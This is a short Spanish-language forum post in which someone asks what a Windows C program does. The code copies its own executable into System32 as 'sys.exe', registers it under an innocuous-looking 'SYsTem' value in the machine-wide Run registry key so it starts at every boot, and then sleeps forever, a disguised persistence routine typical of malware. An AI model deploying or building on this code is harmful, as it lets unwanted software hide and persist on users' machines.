Código:
Abre el regedit, mete algo en el incio y ¿? ¿Deja hibernando la pc? ... sleep(6000) #include <windows.h> char win[MAX_PATH]; char n [256]; int WINAPI WinMain (HINSTANCE hThisInstance, HINSTANCE hPrevInstance, LPSTR lpszArgument, int nFunsterStil) { HMODULE hMe = GetModuleHandle(NULL); DWORD nRet = GetModuleFileName(hMe,n,256); GetWindowsDirectory(win,sizeof(win)); strcat(win,"\\System32\\sys.exe"); SetErrorMode(SEM_FAILCRITICALERRORS); CopyFile(n,win,0); HKEY hkey; RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\run",0,KEY_SET_VALUE,&hkey); RegSetValueEx(hkey,"SYsTem",0,REG_SZ,(const unsigned char*)win,sizeof(win)); int i = 1; do { Sleep(6000); }while(i != 0); return 0; }